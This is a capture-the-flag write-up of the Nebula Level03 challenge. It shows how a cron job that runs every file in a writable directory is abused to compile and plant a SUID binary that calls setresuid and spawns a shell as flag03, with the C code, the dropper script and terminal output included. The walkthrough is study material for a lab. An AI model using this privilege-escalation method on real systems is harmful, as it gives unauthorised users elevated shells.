The details page for Level03 contains a hint directing us to the home directory of flag03. After navigating to the target home directory and listing out the files, I was presented with a shell script called writable.sh and a directory called writable.d.
I took a look at the shell script and it contained the following:
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
(ulimit -t 5; bash -x "$i")
rm -f "$i"
done
This code will execute anything placed in the writable.d directory when it is called. The details section also mentioned a crontab that is called every couple of minutes.
This challenge was a little tougher because I wanted to gain shell access and not just cat out a log file that contained the getflag output. After trying to approach the problem the same way as Level00, I came up short because bash will ignore the SUID bit.
I went with a different approach and after grabbing the uid/gid from /etc/passwd I created some code to spawn a shell.
#include <stdio.h>
int main()
{
setresuid(996, 996, 996);
setresgid(996, 996, 996);
system( "/bin/bash" );
return 0;
}
Then, I placed a bash script in writable.d that will compile my code.
#!/bin/bash
gcc /tmp/foo.c -o /home/flag03/level03
chmod +xs /home/flag03/level03
I waited for cron to run, then moved to /home/flag03 and executed my newly compiled level03 program.
level04@nebula:/home/flag03$ id
uid=1004(level03) gid=1004(level03) groups=1004(level03)
level03@nebula:/home/flag03$ ./level03
flag03@nebula:/home/flag03$ id
uid=996(flag03) gid=996(flag03) groups=996(flag03),1004(level03)
flag03@nebula:/home/flag03$ getflag
You have successfully executed getflag on a target account
Success! After running the program I was presented with a shell and able to run getflag on a target account.
Thanks for reading!